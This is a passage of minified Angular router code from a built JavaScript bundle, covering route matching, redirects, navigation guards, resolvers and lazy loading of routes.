e(t,a);switch(e){case"pathParamsChange":return!fg(t.url,a.url);case"pathParamsOrQueryParamsChange":return!fg(t.url,a.url)||!mu(t.queryParams,a.queryParams);case"always":return!0;case"paramsOrQueryParamsChange":return!Px(t,a)||!mu(t.queryParams,a.queryParams);default:return!Px(t,a)}}(c,r,r.routeConfig.runGuardsAndResolvers);T?n.canActivateChecks.push(new PL(i)):(r.data=c.data,r._resolvedData=c._resolvedData),Iy(t,a,r.component?d?d.children:null:e,i,n),T&&d&&d.outlet&&d.outlet.isActivated&&n.canDeactivateChecks.push(new Z4(d.outlet.component,c))}else c&&Ry(a,d,n),n.canActivateChecks.push(new PL(i)),Iy(t,null,r.component?d?d.children:null:e,i,n)})(c,r[c.value.outlet],e,i.concat([c.value]),n),delete r[c.value.outlet]}),oc(r,(c,d)=>Ry(c,e.getContext(d),n)),n}function Ry(t,a,e){const i=T1(t),n=t.value;oc(i,(r,c)=>{Ry(r,n.component?a?a.children.getContext(c):null:a,e)}),e.canDeactivateChecks.push(new Z4(n.component&&a&&a.outlet&&a.outlet.isActivated?a.outlet.component:null,n))}function Sy(t){return"function"==typeof t}function Fx(t){return t instanceof V4||"EmptyError"===(null==t?void 0:t.name)}const e3=Symbol("INITIAL_VALUE");function D1(){return Ur(t=>mg(t.map(a=>a.pipe(Cn(1),Ro(e3)))).pipe(Xe(a=>{for(const e of a)if(!0!==e){if(e===e3)return e3;if(!1===e||e instanceof hg)return e}return!0}),Dn(a=>a!==e3),Cn(1)))}function OL(t){return function M(...t){return P(t)}(qr(a=>{if(pg(a))throw xL(0,a)}),Xe(a=>!0===a))}const Vx={matched:!1,consumedSegments:[],remainingSegments:[],parameters:{},positionalParamSegments:{}};function NL(t,a,e,i,n){const r=Bx(t,a,e);return r.matched?function Lue(t,a,e,i){const n=a.canMatch;return n&&0!==n.length?Bi(n.map(c=>{const d=E1(c,t);return sp(function Eue(t){return t&&Sy(t.canMatch)}(d)?d.canMatch(a,e):t.runInContext(()=>d(a,e)))})).pipe(D1(),OL()):Bi(!0)}(i=SL(a,i),a,e).pipe(Xe(c=>!0===c?r:Object.assign({},Vx))):Bi(r)}function Bx(t,a,e){var i;if(""===a.path)return"full"===a.pathMatch&&(t.hasChildren()||e.length>0)?Object.assign({},Vx):{matched:!0,consumedSegments:[],remainingSegments:e,parameters:{},positionalParamSegments:{}};const r=(a.matcher||Cme)(e,t,a);if(!r)return Object.assign({},Vx);const c={};oc(r.posParams,(T,k)=>{c[k]=T.path});const d=r.consumed.length>0?Object.assign(Object.assign({},c),r.consumed[r.consumed.length-1].parameters):c;return{matched:!0,consumedSegments:r.consumed,remainingSegments:e.slice(r.consumed.length),parameters:d,positionalParamSegments:null!==(i=r.posParams)&&void 0!==i?i:{}}}function t3(t,a,e,i,n="corrected"){if(e.length>0&&function Fue(t,a,e){return e.some(i=>a3(t,a,i)&&wd(i)!==Nn)}(t,e,i)){const c=new qn(a,function Wue(t,a,e,i){const n={};n[Nn]=i,i._sourceSegment=t,i._segmentIndexShift=a.length;for(const r of e)if(""===r.path&&wd(r)!==Nn){const c=new qn([],{});c._sourceSegment=t,c._segmentIndexShift=a.length,n[wd(r)]=c}return n}(t,a,i,new qn(e,t.children)));return c._sourceSegment=t,c._segmentIndexShift=a.length,{segmentGroup:c,slicedSegments:[]}}if(0===e.length&&function Vue(t,a,e){return e.some(i=>a3(t,a,i))}(t,e,i)){const c=new qn(t.segments,function zue(t,a,e,i,n,r){const c={};for(const d of i)if(a3(t,e,d)&&!n[wd(d)]){const T=new qn([],{});T._sourceSegment=t,T._segmentIndexShift="legacy"===r?t.segments.length:a.length,c[wd(d)]=T}return Object.assign(Object.assign({},n),c)}(t,a,e,i,t.children,n));return c._sourceSegment=t,c._segmentIndexShift=a.length,{segmentGroup:c,slicedSegments:e}}const r=new qn(t.segments,t.children);return r._sourceSegment=t,r._segmentIndexShift=a.length,{segmentGroup:r,slicedSegments:e}}function a3(t,a,e){return(!(t.hasChildren()||a.length>0)||"full"!==e.pathMatch)&&""===e.path}function LL(t,a,e,i){return!!(wd(t)===i||i!==Nn&&a3(a,e,t))&&("**"===t.path||Bx(a,t,e).matched)}function zL(t,a,e){return 0===a.length&&!t.children[e]}const n3=!1;class o3{constructor(a){this.segmentGroup=a||null}}class WL{constructor(a){this.urlTree=a}}function ky(t){return b1(new o3(t))}function FL(t){return b1(new WL(t))}class que{constructor(a,e,i,n,r){this.injector=a,this.configLoader=e,this.urlSerializer=i,this.urlTree=n,this.config=r,this.allowRedirects=!0}apply(){const a=t3(this.urlTree.root,[],[],this.config).segmentGroup,e=new qn(a.segments,a.children);return this.expandSegmentGroup(this.injector,this.config,e,Nn).pipe(Xe(r=>this.createUrlTree(K4(r),this.urlTree.queryParams,this.urlTree.fragment))).pipe(Sh(r=>{if(r instanceof WL)return this.allowRedirects=!1,this.match(r.urlTree);throw r instanceof o3?this.noMatchError(r):r}))}match(a){return this.expandSegmentGroup(this.injector,this.config,a.root,Nn).pipe(Xe(n=>this.createUrlTree(K4(n),a.queryParams,a.fragment))).pipe(Sh(n=>{throw n instanceof o3?this.noMatchError(n):n}))}noMatchError(a){return new gi(4002,n3)}createUrlTree(a,e,i){const n=Ex(a);return new hg(n,e,i)}expandSegmentGroup(a,e,i,n){return 0===i.segments.length&&i.hasChildren()?this.expandChildren(a,e,i).pipe(Xe(r=>new qn([],r))):this.expandSegment(a,i,e,i.segments,n,!0)}expandChildren(a,e,i){const n=[];for(const r of Object.keys(i.children))"primary"===r?n.unshift(r):n.push(r);return Sa(n).pipe(Rh(r=>{const c=i.children[r],d=kL(e,r);return this.expandSegmentGroup(a,d,c,r).pipe(Xe(T=>({segment:T,outlet:r})))}),JN((r,c)=>(r[c.outlet]=c.segment,r),{}),ZN())}expandSegment(a,e,i,n,r,c){return Sa(i).pipe(Rh(d=>this.expandSegmentAgainstRoute(a,e,i,d,n,r,c).pipe(Sh(k=>{if(k instanceof o3)return Bi(null);throw k}))),xd(d=>!!d),Sh((d,T)=>{if(Fx(d))return zL(e,n,r)?Bi(new qn([],{})):ky(e);throw d}))}expandSegmentAgainstRoute(a,e,i,n,r,c,d){return LL(n,e,r,c)?void 0===n.redirectTo?this.matchSegmentAgainstRoute(a,e,n,r,c):d&&this.allowRedirects?this.expandSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c):ky(e):ky(e)}expandSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c){return"**"===n.path?this.expandWildCardWithParamsAgainstRouteUsingRedirect(a,i,n,c):this.expandRegularSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c)}expandWildCardWithParamsAgainstRouteUsingRedirect(a,e,i,n){const r=this.applyRedirectCommands([],i.redirectTo,{});return i.redirectTo.startsWith("/")?FL(r):this.lineralizeSegments(i,r).pipe(Ut(c=>{const d=new qn(c,{});return this.expandSegment(a,d,e,c,n,!1)}))}expandRegularSegmentAgainstRouteUsingRedirect(a,e,i,n,r,c){const{matched:d,consumedSegments:T,remainingSegments:k,positionalParamSegments:q}=Bx(e,n,r);if(!d)return ky(e);const Y=this.applyRedirectCommands(T,n.redirectTo,q);return n.redirectTo.startsWith("/")?FL(Y):this.lineralizeSegments(n,Y).pipe(Ut(te=>this.expandSegment(a,e,i,te.concat(k),c,!1)))}matchSegmentAgainstRoute(a,e,i,n,r){return"**"===i.path?(a=SL(i,a),i.loadChildren?(i._loadedRoutes?Bi({routes:i._loadedRoutes,injector:i._loadedInjector}):this.configLoader.loadChildren(a,i)).pipe(Xe(d=>(i._loadedRoutes=d.routes,i._loadedInjector=d.injector,new qn(n,{})))):Bi(new qn(n,{}))):NL(e,i,n,a).pipe(Ur(({matched:c,consumedSegments:d,remainingSegments:T})=>{var k;return c?(a=null!==(k=i._injector)&&void 0!==k?k:a,this.getChildConfig(a,i,n).pipe(Ut(Y=>{var te;const pe=null!==(te=Y.injector)&&void 0!==te?te:a,Re=Y.routes,{segmentGroup:Fe,slicedSegments:Ne}=t3(e,d,T,Re),et=new qn(Fe.segments,Fe.children);if(0===Ne.length&&et.hasChildren())return this.expandChildren(pe,Re,et).pipe(Xe(It=>new qn(d,It)));if(0===Re.length&&0===Ne.length)return Bi(new qn(d,{}));const ut=wd(i)===r;return this.expandSegment(pe,et,Re,Ne,ut?Nn:r,!0).pipe(Xe(yt=>new qn(d.concat(yt.segments),yt.children)))}))):ky(e)}))}getChildConfig(a,e,i){return e.children?Bi({routes:e.children,injector:a}):e.loadChildren?void 0!==e._loadedRoutes?Bi({routes:e._loadedRoutes,injector:e._loadedInjector}):function Nue(t,a,e,i){const n=a.canLoad;return void 0===n||0===n.length?Bi(!0):Bi(n.map(c=>{const d=E1(c,t);return sp(function Mue(t){return t&&Sy(t.canLoad)}(d)?d.canLoad(a,e):t.runInContext(()=>d(a,e)))})).pipe(D1(),OL())}(a,e,i).pipe(Ut(n=>n?this.configLoader.loadChildren(a,e).pipe(qr(r=>{e._loadedRoutes=r.routes,e._loadedInjector=r.injector})):function Hue(t){return b1(wL(n3,3))}())):Bi({routes:[],injector:a})}lineralizeSegments(a,e){let i=[],n=e.root;for(;;){if(i=i.concat(n.segments),0===n.numberOfChildren)return Bi(i);if(n.numberOfChildren>1||!n.children[Nn])return b1(new gi(4e3,n3));n=n.children[Nn]}}applyRedirectCommands(a,e,i){return this.applyRedirectCreateUrlTree(e,this.urlSerializer.parse(e),a,i)}applyRedirectCreateUrlTree(a,e,i,n){const r=this.createSegmentGroup(a,e.root,i,n);return new hg(r,this.createQueryParams(e.queryParams,this.urlTree.queryParams),e.fragment)}createQueryParams(a,e){const i={};return oc(a,(n,r)=>{if("string"==typeof n&&n.startsWith(":")){const d=n.substring(1);i[r]=e[d]}else i[r]=n}),i}createSegmentGroup(a,e,i,n){const r=this.createSegments(a,e.segments,i,n);let c={};return oc(e.children,(d,T)=>{c[T]=this.createSegmentGroup(a,d,i,n)}),new qn(r,c)}createSegments(a,e,i,n){return e.map(r=>r.path.startsWith(":")?this.findPosParam(a,r,n):this.findOrReturn(r,i))}findPosParam(a,e,i){const n=i[e.path.substring(1)];if(!n)throw new gi(4001,n3);return n}findOrReturn(a,e){let i=0;for(const n of e){if(n.path===a.path)return e.splice(i),n;i++}return a}}class jue{}class Kue{constructor(a,e,i,n,r,c,d,T){this.injector=a,this.rootComponentType=e,this.config=i,this.urlTree=n,this.url=r,this.paramsInheritanceStrategy=c,this.relativeLinkResolution=d,this.urlSerializer=T}recognize(){const a=t3(this.urlTree.root,[],[],this.config.filter(e=>void 0===e.redirectTo),this.relativeLinkResolution).segmentGroup;return this.processSegmentGroup(this.injector,this.config,a,Nn).pipe(Xe(e=>{if(null===e)return null;const i=new Y4([],Object.freeze({}),Object.freeze(Object.assign({},this.urlTree.queryParams)),this.urlTree.fragment,{},Nn,this.rootComponentType,null,this.urlTree.root,-1,{}),n=new Oh(i,e),r=new EL(this.url,n);return this.inheritParamsAndData(r._root),r}))}inheritParamsAndData(a){const e=a.value,i=TL(e,this.paramsInheritanceStrategy);e.params=Object.freeze(i.params),e.data=Object.freeze(i.data),a.children.forEach(n=>this.inheritParamsAndData(n))}processSegmentGroup(a,e,i,n){return 0===i.segments.length&&i.hasChildren()?this.processChildren(a,e,i):this.processSegment(a,e,i,i.segments,n)}processChildren(a,e,i){return Sa(Object.keys(i.children)).pipe(Rh(n=>{const r=i.children[n],c=kL(e,n);return this.processSegmentGroup(a,c,r,n)}),JN((n,r)=>n&&r?(n.push(...r),n):null),eL(n=>null!==n),B4(null),ZN(),Xe(n=>{if(null===n)return null;const r=VL(n);return function Xue(t){t.sort((a,e)=>a.value.outlet===Nn?-1:e.value.outlet===Nn?1:a.value.outlet.localeCompare(e.value.outlet))}(r),r}))}processSegment(a,e,i,n,r){return Sa(e).pipe(Rh(c=>{var d;return this.processSegmentAgainstRoute(null!==(d=c._injector)&&void 0!==d?d:a,c,i,n,r)}),xd(c=>!!c),Sh(c=>{if(Fx(c))return zL(i,n,r)?Bi([]):Bi(null);throw c}))}processSegmentAgainstRoute(a,e,i,n,r){var c,d;if(e.redirectTo||!LL(e,i,n,r))return Bi(null);let T;if("**"===e.path){const k=n.length>0?aL(n).parameters:{},q=HL(i)+n.length;T=Bi({snapshot:new Y4(n,k,Object.freeze(Object.assign({},this.urlTree.queryParams)),this.urlTree.fragment,qL(e),wd(e),null!==(d=null!==(c=e.component)&&void 0!==c?c:e._loadedComponent)&&void 0!==d?d:null,e,BL(i),q,GL(e),q),consumedSegments:[],remainingSegments:[]})}else T=NL(i,e,n,a).pipe(Xe(({matched:k,consumedSegments:q,remainingSegments:Y,parameters:te})=>{var pe,Re;if(!k)return null;const Fe=HL(i)+q.length;return{snapshot:new Y4(q,te,Object.freeze(Object.assign({},this.urlTree.queryParams)),this.urlTree.fragment,qL(e),wd(e),null!==(Re=null!==(pe=e.component)&&void 0!==pe?pe:e._loadedComponent)&&void 0!==Re?Re:null,e,BL(i),Fe,GL(e),Fe),consumedSegments:q,remainingSegments:Y}}));return T.pipe(Ur(k=>{var q,Y;if(null===k)return Bi(null);const{snapshot:te,consumedSegments:pe,remainingSegments:Re}=k;a=null!==(q=e._injector)&&void 0!==q?q:a;const Fe=null!==(Y=e._loadedInjector)&&void 0!==Y?Y:a,Ne=function Yue(t){return t.children?t.children:t.loadChildren?t._loadedRoutes:[]}(e),{segmentGroup:et,slicedSegments:ut}=t3(i,pe,Re,Ne.filter(yt=>void 0===yt.redirectTo),this.relativeLinkResolution);if(0===ut.length&&et.hasChildren())return this.processChildren(Fe,Ne,et).pipe(Xe(yt=>null===yt?null:[new Oh(te,yt)]));if(0===Ne.length&&0===ut.length)return Bi([new Oh(te,[])]);const Ze=wd(e)===r;return this.processSegment(Fe,Ne,et,ut,Ze?Nn:r).pipe(Xe(yt=>null===yt?null:[new Oh(te,yt)]))}))}}function Jue(t){const a=t.value.routeConfig;return a&&""===a.path&&void 0===a.redirectTo}function VL(t){const a=[],e=new Set;for(const i of t){if(!Jue(i)){a.push(i);continue}const n=a.find(r=>i.value.routeConfig===r.value.routeConfig);void 0!==n?(n.children.push(...i.children),e.add(n)):a.push(i)}for(const i of e){const n=VL(i.children);a.push(new Oh(i.value,n))}return a.filter(i=>!e.has(i))}function BL(t){let a=t;for(;a._sourceSegment;)a=a._sourceSegment;return a}function HL(t){var a,e;let i=t,n=null!==(a=i._segmentIndexShift)&&void 0!==a?a:0;for(;i._sourceSegment;)i=i._sourceSegment,n+=null!==(e=i._segmentIndexShift)&&void 0!==e?e:0;return n-1}function qL(t){return t.data||{}}function GL(t){return t.resolve||{}}function jL(t){return"string"==typeof t.title||null===t.title}function Hx(t){return Ur(a=>{const e=t(a);return e?Sa(e).pipe(Xe(()=>a)):Bi(a)})}let QL=(()=>{class t{buildTitle(e){var i;let n,r=e.root;for(;void 0!==r;)n=null!==(i=this.getResolvedTitleForRoute(r))&&void 0!==i?i:n,r=r.children.find(c=>c.outlet===Nn);return n}getResolvedTitleForRoute(e){return e.data[yy]}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return Po($L)},providedIn:"root"}),t})(),$L=(()=>{class t extends QL{constructor(e){super(),this.title=e}updateTitle(e){const i=this.buildTitle(e);void 0!==i&&this.title.setTitle(i)}}return t.\u0275fac=function(e){return new(e||t)(At(UP))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();class rhe{}class che extends class she{shouldDetach(a){return!1}store(a,e){}shouldAttach(a){return!1}retrieve(a){return null}shouldReuseRoute(a,e){return a.routeConfig===e.routeConfig}}{}const s3=new ni("",{providedIn:"root",factory:()=>({})}),Ux=new ni("ROUTES");let qx=(()=>{class t{constructor(e,i){this.injector=e,this.compiler=i,this.componentLoaders=new WeakMap,this.childrenLoaders=new WeakMap}loadComponent(e){if(this.componentLoaders.get(e))return this.componentLoaders.get(e);if(e._loadedComponent)return Bi(e._loadedComponent);this.onLoadStartListener&&this.onLoadStartListener(e);const i=sp(e.loadComponent()).pipe(qr(r=>{this.onLoadEndListener&&this.onLoadEndListener(e),e._loadedComponent=r}),U4(()=>{this.componentLoaders.delete(e)})),n=new bx(i,()=>new J).pipe(yx());return this.componentLoaders.set(e,n),n}loadChildren(e,i){if(this.childrenLoaders.get(i))return this.childrenLoaders.get(i);if(i._loadedRoutes)return Bi({routes:i._loadedRoutes,injector:i._loadedInjector});this.onLoadStartListener&&this.onLoadStartListener(i);const r=this.loadModuleFactoryOrRoutes(i.loadChildren).pipe(Xe(d=>{this.onLoadEndListener&&this.onLoadEndListener(i);let T,k,q=!1;Array.isArray(d)?k=d:(T=d.create(e).injector,k=iL(T.get(Ux,[],Da.Self|Da.Optional)));return{routes:k.map(Wx),injector:T}}),U4(()=>{this.childrenLoaders.delete(i)})),c=new bx(r,()=>new J).pipe(yx());return this.childrenLoaders.set(i,c),c}loadModuleFactoryOrRoutes(e){return sp(e()).pipe(Ut(i=>i instanceof Ok||Array.isArray(i)?Bi(i):Sa(this.compiler.compileModuleAsync(i))))}}return t.\u0275fac=function(e){return new(e||t)(At(Ko),At(WD))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();class dhe{}class mhe{shouldProcessUrl(a){return!0}extract(a){return a}merge(a,e){return a}}function uhe(t){throw t}function hhe(t,a,e){return a.parse("/")}const fhe={paths:"exact",fragment:"ignored",matrixParams:"ignored",queryParams:"exact"},phe={paths:"subset",fragment:"ignored",matrixParams:"ignored",queryParams:"subset"};function XL(){var t,a;const e=Po(lL),i=Po(xy),n=Po(iy),r=Po(Ko),c=Po(WD),d=null!==(t=Po(Ux,{optional:!0}))&&void 0!==t?t:[],T=null!==(a=Po(s3,{optional:!0}))&&void 0!==a?a:{},k=Po($L),q=Po(QL,{optional:!0}),Y=Po(dhe,{optional:!0}),te=Po(rhe,{optional:!0}),pe=new Oo(null,e,i,n,r,c,iL(d));return Y&&(pe.urlHandlingStrategy=Y),te&&(pe.routeReuseStrategy=te),pe.titleStrategy=null!=q?q:k,function _he(t,a){t.errorHandler&&(a.errorHandler=t.errorHandler),t.malformedUriErrorHandler&&(a.malformedUriErrorHandler=t.malformedUriErrorHandler),t.onSameUrlNavigation&&(a.onSameUrlNavigation=t.onSameUrlNavigation),t.paramsInheritanceStrategy&&(a.paramsInheritanceStrategy=t.paramsInheritanceStrategy),t.relativeLinkResolution&&(a.relativeLinkResolution=t.relativeLinkResolution),t.urlUpdateStrategy&&(a.urlUpdateStrategy=t.urlUpdateStrategy),t.canceledNavigationResolution&&(a.canceledNavigationResolution=t.canceledNavigationResolution)}(T,pe),pe}let Oo=(()=>{class t{constructor(e,i,n,r,c,d,T){this.rootComponentType=e,this.urlSerializer=i,this.rootContexts=n,this.location=r,this.config=T,this.lastSuccessfulNavigation=null,this.currentNavigation=null,this.disposed=!1,this.navigationId=0,this.currentPageId=0,this.isNgZoneEnabled=!1,this.events=new J,this.errorHandler=uhe,this.malformedUriErrorHandler=hhe,this.navigated=!1,this.lastSuccessfulId=-1,this.afterPreactivation=()=>Bi(void 0),this.urlHandlingStrategy=new mhe,this.routeReuseStrategy=new che,this.onSameUrlNavigation="ignore",this.paramsInheritanceStrategy="emptyOnly",this.urlUpdateStrategy="deferred",this.relativeLinkResolution="corrected",this.canceledNavigationResolution="replace",this.configLoader=c.get(qx),this.configLoader.onLoadEndListener=te=>this.triggerEvent(new Yme(te)),this.configLoader.onLoadStartListener=te=>this.triggerEvent(new Xme(te)),this.ngModule=c.get(Z_),this.console=c.get(toe);const Y=c.get(qi);this.isNgZoneEnabled=Y instanceof qi&&qi.isInAngularZone(),this.resetConfig(T),this.currentUrlTree=function bme(){return new hg(new qn([],{}),{},null)}(),this.rawUrlTree=this.currentUrlTree,this.browserUrlTree=this.currentUrlTree,this.routerState=AL(this.currentUrlTree,this.rootComponentType),this.transitions=new zs({id:0,targetPageId:0,currentUrlTree:this.currentUrlTree,currentRawUrl:this.currentUrlTree,extractedUrl:this.urlHandlingStrategy.extract(this.currentUrlTree),urlAfterRedirects:this.urlHandlingStrategy.extract(this.currentUrlTree),rawUrl:this.currentUrlTree,extras:{},resolve:null,reject:null,promise:Promise.resolve(!0),source:"imperative",restoredState:null,currentSnapshot:this.routerState.snapshot,targetSnapshot:null,currentRouterState:this.routerState,targetRouterState:null,guards:{canActivateChecks:[],canDeactivateChecks:[]},guardsResult:null}),this.navigations=this.setupNavigations(this.transitions),this.processNavigations()}get browserPageId(){var e;return null===(e=this.location.getState())||void 0===e?void 0:e.\u0275routerPageId}setupNavigations(e){const i=this.events;return e.pipe(Dn(n=>0!==n.id),Xe(n=>Object.assign(Object.assign({},n),{extractedUrl:this.urlHandlingStrategy.extract(n.rawUrl)})),Ur(n=>{let r=!1,c=!1;return Bi(n).pipe(qr(d=>{this.currentNavigation={id:d.id,initialUrl:d.rawUrl,extractedUrl:d.extractedUrl,trigger:d.source,extras:d.extras,previousNavigation:this.lastSuccessfulNavigation?Object.assign(Object.assign({},this.lastSuccessfulNavigation),{previousNavigation:null}):null}}),Ur(d=>{const T=this.browserUrlTree.toString(),k=!this.navigated||d.extractedUrl.toString()!==T||T!==this.currentUrlTree.toString();if(("reload"===this.onSameUrlNavigation||k)&&this.urlHandlingStrategy.shouldProcessUrl(d.rawUrl))return YL(d.source)&&(this.browserUrlTree=d.extractedUrl),Bi(d).pipe(Ur(Y=>{const te=this.transitions.getValue();return i.next(new Ey(Y.id,this.serializeUrl(Y.extractedUrl),Y.source,Y.restoredState)),te!==this.transitions.getValue()?ha:Promise.resolve(Y)}),function Gue(t,a,e,i){return Ur(n=>function Uue(t,a,e,i,n){return new que(t,a,e,i,n).apply()}(t,a,e,n.extractedUrl,i).pipe(Xe(r=>Object.assign(Object.assign({},n),{urlAfterRedirects:r}))))}(this.ngModule.injector,this.configLoader,this.urlSerializer,this.config),qr(Y=>{this.currentNavigation=Object.assign(Object.assign({},this.currentNavigation),{finalUrl:Y.urlAfterRedirects}),n.urlAfterRedirects=Y.urlAfterRedirects}),function ehe(t,a,e,i,n,r){return Ut(c=>function $ue(t,a,e,i,n,r,c="emptyOnly",d="legacy"){return new Kue(t,a,e,i,n,c,d,r).recognize().pipe(Ur(T=>null===T?function Que(t){return new G(a=>a.error(t))}(new jue):Bi(T)))}(t,a,e,c.urlAfterRedirects,i.serialize(c.urlAfterRedirects),i,n,r).pipe(Xe(d=>Object.assign(Object.assign({},c),{targetSnapshot:d}))))}(this.ngModule.injector,this.rootComponentType,this.config,this.urlSerializer,this.paramsInheritanceStrategy,this.relativeLinkResolution),qr(Y=>{if(n.targetSnapshot=Y.targetSnapshot,"eager"===this.urlUpdateStrategy){if(!Y.extras.skipLocationChange){const pe=this.urlHandlingStrategy.merge(Y.urlAfterRedirects,Y.rawUrl);this.setBrowserUrl(pe,Y)}this.browserUrlTree=Y.urlAfterRedirects}const te=new Gme(Y.id,this.serializeUrl(Y.extractedUrl),this.serializeUrl(Y.urlAfterRedirects),Y.targetSnapshot);i.next(te)}));if(k&&this.rawUrlTree&&this.urlHandlingStrategy.shouldProcessUrl(this.rawUrlTree)){const{id:te,extractedUrl:pe,source:Re,restoredState:Fe,extras:Ne}=d,et=new Ey(te,this.serializeUrl(pe),Re,Fe);i.next(et);const ut=AL(pe,this.rootComponentType).snapshot;return Bi(n=Object.assign(Object.assign({},d),{targetSnapshot:ut,urlAfterRedirects:pe,extras:Object.assign(Object.assign({},Ne),{skipLocationChange:!1,replaceUrl:!1})}))}return this.rawUrlTree=d.rawUrl,d.resolve(null),ha}),qr(d=>{const T=new jme(d.id,this.serializeUrl(d.extractedUrl),this.serializeUrl(d.urlAfterRedirects),d.targetSnapshot);this.triggerEvent(T)}),Xe(d=>n=Object.assign(Object.assign({},d),{guards:_ue(d.targetSnapshot,d.currentSnapshot,this.rootContexts)})),function xue(t,a){return Ut(e=>{const{targetSnapshot:i,currentSnapshot:n,guards:{canActivateChecks:r,canDeactivateChecks:c}}=e;return 0===c.length&&0===r.length?Bi(Object.assign(Object.assign({},e),{guardsResult:!0})):function wue(t,a,e,i){return Sa(t).pipe(Ut(n=>function Oue(t,a,e,i,n){const r=a&&a.routeConfig?a.routeConfig.canDeactivate:null;return r&&0!==r.length?Bi(r.map(d=>{var T;const k=null!==(T=wy(a))&&void 0!==T?T:n,q=E1(d,k);return sp(function Tue(t){return t&&Sy(t.canDeactivate)}(q)?q.canDeactivate(t,a,e,i):k.runInContext(()=>q(t,a,e,i))).pipe(xd())})).pipe(D1()):Bi(!0)}(n.component,n.route,e,a,i)),xd(n=>!0!==n,!0))}(c,i,n,t).pipe(Ut(d=>d&&function bue(t){return"boolean"==typeof t}(d)?function Iue(t,a,e,i){return Sa(a).pipe(Rh(n=>ug(function Sue(t,a){return null!==t&&a&&a(new Jme(t)),Bi(!0)}(n.route.parent,i),function Rue(t,a){return null!==t&&a&&a(new eue(t)),Bi(!0)}(n.route,i),function Pue(t,a,e){const i=a[a.length-1],r=a.slice(0,a.length-1).reverse().map(c=>function gue(t){const a=t.routeConfig?t.routeConfig.canActivateChild:null;return a&&0!==a.length?{node:t,guards:a}:null}(c)).filter(c=>null!==c).map(c=>rp(()=>Bi(c.guards.map(T=>{var k;const q=null!==(k=wy(c.node))&&void 0!==k?k:e,Y=E1(T,q);return sp(function Aue(t){return t&&Sy(t.canActivateChild)}(Y)?Y.canActivateChild(i,t):q.runInContext(()=>Y(i,t))).pipe(xd())})).pipe(D1())));return Bi(r).pipe(D1())}(t,n.path,e),function kue(t,a,e){const i=a.routeConfig?a.routeConfig.canActivate:null;if(!i||0===i.length)return Bi(!0);const n=i.map(r=>rp(()=>{var c;const d=null!==(c=wy(a))&&void 0!==c?c:e,T=E1(r,d);return sp(function vue(t){return t&&Sy(t.canActivate)}(T)?T.canActivate(a,t):d.runInContext(()=>T(a,t))).pipe(xd())}));return Bi(n).pipe(D1())}(t,n.route,e))),xd(n=>!0!==n,!0))}(i,r,t,a):Bi(d)),Xe(d=>Object.assign(Object.assign({},e),{guardsResult:d})))})}(this.ngModule.injector,d=>this.triggerEvent(d)),qr(d=>{if(n.guardsResult=d.guardsResult,pg(d.guardsResult))throw xL(0,d.guardsResult);const T=new Qme(d.id,this.serializeUrl(d.extractedUrl),this.serializeUrl(d.urlAfterRedirects),d.targetSnapshot,!!d.guardsResult);this.triggerEvent(T)}),Dn(d=>!!d.guardsResult||(this.restoreHistory(d),this.cancelNavigationTransition(d,"",3),!1)),Hx(d=>{if(d.guards.canActivateChecks.length)return Bi(d).pipe(qr(T=>{const k=new $me(T.id,this.serializeUrl(T.extractedUrl),this.serializeUrl(T.urlAfterRedirects),T.targetSnapshot);this.triggerEvent(k)}),Ur(T=>{let k=!1;return Bi(T).pipe(function the(t,a){return Ut(e=>{const{targetSnapshot:i,guards:{canActivateChecks:n}}=e;if(!n.length)return Bi(e);let r=0;return Sa(n).pipe(Rh(c=>function ihe(t,a,e,i){const n=t.routeConfig,r=t._resolve;return void 0!==(null==n?void 0:n.title)&&!jL(n)&&(r[yy]=n.title),function ahe(t,a,e,i){const n=function nhe(t){return[...Object.keys(t),...Object.getOwnPropertySymbols(t)]}(t);if(0===n.length)return Bi({});const r={};return Sa(n).pipe(Ut(c=>function ohe(t,a,e,i){var n;const r=null!==(n=wy(a))&&void 0!==n?n:i,c=E1(t,r);return sp(c.resolve?c.resolve(a,e):r.runInContext(()=>c(a,e)))}(t[c],a,e,i).pipe(xd(),qr(d=>{r[c]=d}))),Mx(1),H4(r),Sh(c=>Fx(c)?ha:b1(c)))}(r,t,a,i).pipe(Xe(c=>(t._resolvedData=c,t.data=TL(t,e).resolve,n&&jL(n)&&(t.data[yy]=n.title),null)))}(c.route,i,t,a)),qr(()=>r++),Mx(1),Ut(c=>r===n.length?Bi(e):ha))})}(this.paramsInheritanceStrategy,this.ngModule.injector),qr({next:()=>k=!0,complete:()=>{k||(this.restoreHistory(T),this.cancelNavigationTransition(T,"",2))}}))}),qr(T=>{const k=new Kme(T.id,this.serializeUrl(T.extractedUrl),this.serializeUrl(T.urlAfterRedirects),T.targetSnapshot);this.triggerEvent(k)}))}),Hx(d=>{const T=k=>{var q;const Y=[];(null===(q=k.routeConfig)||void 0===q?void 0:q.loadComponent)&&!k.routeConfig._loadedComponent&&Y.push(this.configLoader.loadComponent(k.routeConfig).pipe(qr(te=>{k.component=te}),Xe(()=>{})));for(const te of k.children)Y.push(...T(te));return Y};return mg(T(d.targetSnapshot.root)).pipe(B4(),Cn(1))}),Hx(()=>this.afterPreactivation()),Xe(d=>{const T=function oue(t,a,e){const i=Dy(t,a._root,e?e._root:void 0);return new vL(i,a)}(this.routeReuseStrategy,d.targetSnapshot,d.currentRouterState);return n=Object.assign(Object.assign({},d),{targetRouterState:T})}),qr(d=>{this.currentUrlTree=d.urlAfterRedirects,this.rawUrlTree=this.urlHandlingStrategy.merge(d.urlAfterRedirects,d.rawUrl),this.routerState=d.targetRouterState,"deferred"===this.urlUpdateStrategy&&(d.extras.skipLocationChange||this.setBrowserUrl(this.rawUrlTree,d),this.browserUrlTree=d.urlAfterRedirects)}),((t,a,e)=>Xe(i=>(new pue(a,i.targetRouterState,i.currentRouterState,e).activate(t),i)))(this.rootContexts,this.routeReuseStrategy,d=>this.triggerEvent(d)),qr({next(){r=!0},complete(){r=!0}}),U4(()=>{var d;r||c||this.cancelNavigationTransition(n,"",1),(null===(d=this.currentNavigation)||void 0===d?void 0:d.id)===n.id&&(this.currentNavigation=null)}),Sh(d=>{var T;if(c=!0,RL(d)){IL(d)||(this.navigated=!0,this.restoreHistory(n,!0));const k=new X4(n.id,this.serializeUrl(n.extractedUrl),d.message,d.cancellationCode);if(i.next(k),IL(d)){const 